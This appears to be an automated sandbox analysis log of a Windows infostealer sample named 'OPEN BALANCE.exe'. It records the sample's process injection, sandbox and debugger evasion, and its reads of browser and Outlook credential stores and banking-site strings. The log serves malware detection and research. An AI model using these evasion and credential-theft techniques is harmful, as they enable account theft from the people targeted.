Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008B37B5 GetLastError,FormatMessageW,

0_2_008B37B5

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008A10BF AdjustTokenPrivileges,CloseHandle,		0_2_008A10BF
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008A16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_008A16C3

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008B51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_008B51CD

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008CA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_008CA67C

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008442A2 FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_008442A2

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

File created: C:\Users\user\AppData\Local\Temp\autB109.tmp

Jump to behavior

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: attrib.exe, 00000005.00000003.2786751445.000000000298C000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 00000005.00000002.3918152730.00000000029AF000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 00000005.00000002.3918152730.0000000002981000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 00000005.00000003.2776072174.0000000002960000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 00000005.00000003.2776202191.0000000002981000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: OPEN BALANCE.exe	ReversingLabs: Detection: 47%
Source: OPEN BALANCE.exe	Virustotal: Detection: 33%

Source: unknown	Process created: C:\Users\user\Desktop\OPEN BALANCE.exe "C:\Users\user\Desktop\OPEN BALANCE.exe"
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OPEN BALANCE.exe"
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	Process created: C:\Windows\SysWOW64\attrib.exe "C:\Windows\SysWOW64\attrib.exe"
Source: C:\Windows\SysWOW64\attrib.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OPEN BALANCE.exe"	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	Process created: C:\Windows\SysWOW64\attrib.exe "C:\Windows\SysWOW64\attrib.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\attrib.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: attrib.pdb source: svchost.exe, 00000002.00000002.2469853116.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438356365.000000000341A000.00000004.00000020.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000004.00000002.3918728381.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000004.00000003.2408309589.000000000110B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VnZdrTcLqvUA.exe, 00000004.00000000.2392780580.0000000000CBE000.00000002.00000001.01000000.00000005.sdmp, VnZdrTcLqvUA.exe, 00000008.00000000.2659886240.0000000000CBE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: OPEN BALANCE.exe, 00000000.00000003.2054402691.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, OPEN BALANCE.exe, 00000000.00000003.2055222342.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2244011021.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2469948379.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2469948379.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2255328825.0000000003800000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 00000005.00000002.3919244777.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, attrib.exe, 00000005.00000003.2470619254.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 00000005.00000002.3919244777.000000000309E000.00000040.00001000.00020000.00000000.sdmp, attrib.exe, 00000005.00000003.2478806719.0000000002D4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: OPEN BALANCE.exe, 00000000.00000003.2054402691.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, OPEN BALANCE.exe, 00000000.00000003.2055222342.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2244011021.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2469948379.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2469948379.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2255328825.0000000003800000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, attrib.exe, 00000005.00000002.3919244777.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, attrib.exe, 00000005.00000003.2470619254.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 00000005.00000002.3919244777.000000000309E000.00000040.00001000.00020000.00000000.sdmp, attrib.exe, 00000005.00000003.2478806719.0000000002D4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: attrib.pdbGCTL source: svchost.exe, 00000002.00000002.2469853116.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438356365.000000000341A000.00000004.00000020.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000004.00000002.3918728381.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000004.00000003.2408309589.000000000110B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: attrib.exe, 00000005.00000002.3919772809.000000000352C000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3918152730.0000000002900000.00000004.00000020.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000025BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.000000003927C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: attrib.exe, 00000005.00000002.3919772809.000000000352C000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3918152730.0000000002900000.00000004.00000020.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000025BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.000000003927C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008442DE

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008DC85D pushfd ; iretd	0_2_008DC85E
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00860A76 push ecx; ret	0_2_00860A89
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008E1005 push esi; ret	0_2_008E100E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D160 push fs; retf	2_2_0040D167
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004111E7 push edi; ret	2_2_004111FA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004111F3 push edi; ret	2_2_004111FA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042D993 push edi; ret	2_2_0042D999
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403520 push eax; ret	2_2_00403522
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx	2_2_03A309B6
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F0225F pushad ; ret	5_2_02F027F9
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F027FA pushad ; ret	5_2_02F027F9
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F0283D push eax; iretd	5_2_02F02858
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F309AD push ecx; mov dword ptr [esp], ecx	5_2_02F309B6
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F01368 push eax; iretd	5_2_02F01369
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02562290 push esp; retf	5_2_0256229A
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_025707B2 push esp; retf	5_2_025707B3
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_0257A470 push edi; ret	5_2_0257A476
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02566C7D push eax; retn 39A4h	5_2_02566D40
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_0255DCD0 push edi; ret	5_2_0255DCD7
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_0255DCC4 push edi; ret	5_2_0255DCD7
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02DD5242 push ecx; ret	5_2_02DD5245
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02DD7370 push es; ret	5_2_02DD7375
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02DE5182 push eax; ret	5_2_02DE5184
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02DD7419 push esi; iretd	5_2_02DD741D
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02DE042B push cs; ret	5_2_02DE042C

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_0085F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0085F98E
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008D1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_008D1C41

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-98028

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	API/Special instruction interceptor: Address: 14E3244
Source: C:\Windows\SysWOW64\attrib.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\attrib.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\attrib.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\attrib.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\attrib.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\attrib.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\attrib.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03A7096E rdtsc

2_2_03A7096E

Source: C:\Windows\SysWOW64\attrib.exe	Window / User API: threadDelayed 395			Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Window / User API: threadDelayed 9575			Jump to behavior

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	API coverage: 3.8 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\attrib.exe	API coverage: 2.4 %

Source: C:\Windows\SysWOW64\attrib.exe TID: 6768	Thread sleep count: 395 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe TID: 6768	Thread sleep time: -790000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe TID: 6768	Thread sleep count: 9575 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe TID: 6768	Thread sleep time: -19150000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe TID: 3624	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe TID: 3624	Thread sleep time: -31500s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\attrib.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\attrib.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_008ADBBE
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_0087C2A2 FindFirstFileExW,	0_2_0087C2A2
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008B68EE FindFirstFileW,FindClose,	0_2_008B68EE
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_008B698F
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_008AD076
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_008AD3A9
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_008B9642
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_008B979D
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_008B9B2B
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008B5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_008B5C97
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_0256BDC0 FindFirstFileW,FindNextFileW,FindClose,	5_2_0256BDC0

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008442DE

Source: 51688324h.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 51688324h.5.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 51688324h.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 51688324h.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 51688324h.5.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 51688324h.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: attrib.exe, 00000005.00000002.3921802984.00000000079BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: word management pageVMware20,11696428655iB
Source: attrib.exe, 00000005.00000002.3921802984.00000000079BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: blocklistVMware20,11696428655
Source: 51688324h.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 51688324h.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 51688324h.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: attrib.exe, 00000005.00000002.3921802984.00000000079BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: last_fourVARCHARVMware9
Source: 51688324h.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 51688324h.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 51688324h.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 51688324h.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 51688324h.5.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 51688324h.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: attrib.exe, 00000005.00000002.3918152730.0000000002900000.00000004.00000020.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3918144535.000000000044F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2914727926.0000019CF91DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 51688324h.5.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 51688324h.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: attrib.exe, 00000005.00000002.3921802984.00000000079BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: word management pageVMware20,11696428655
Source: 51688324h.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 51688324h.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 51688324h.5.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 51688324h.5.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 51688324h.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 51688324h.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 51688324h.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 51688324h.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 51688324h.5.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 51688324h.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: attrib.exe, 00000005.00000002.3921802984.00000000079BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware9
Source: 51688324h.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 51688324h.5.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 51688324h.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 51688324h.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03A7096E rdtsc

2_2_03A7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417643 LdrLoadDll,

2_2_00417643

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008BEAA2 BlockInput,

0_2_008BEAA2

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_00872622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00872622

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008442DE

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00864CE8 mov eax, dword ptr fs:[00000030h]	0_2_00864CE8
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_014E3510 mov eax, dword ptr fs:[00000030h]	0_2_014E3510
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_014E34B0 mov eax, dword ptr fs:[00000030h]	0_2_014E34B0
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_014E1E70 mov eax, dword ptr fs:[00000030h]	0_2_014E1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]	2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]	2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]	2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]	2_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]	2_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]	2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]	2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]	2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
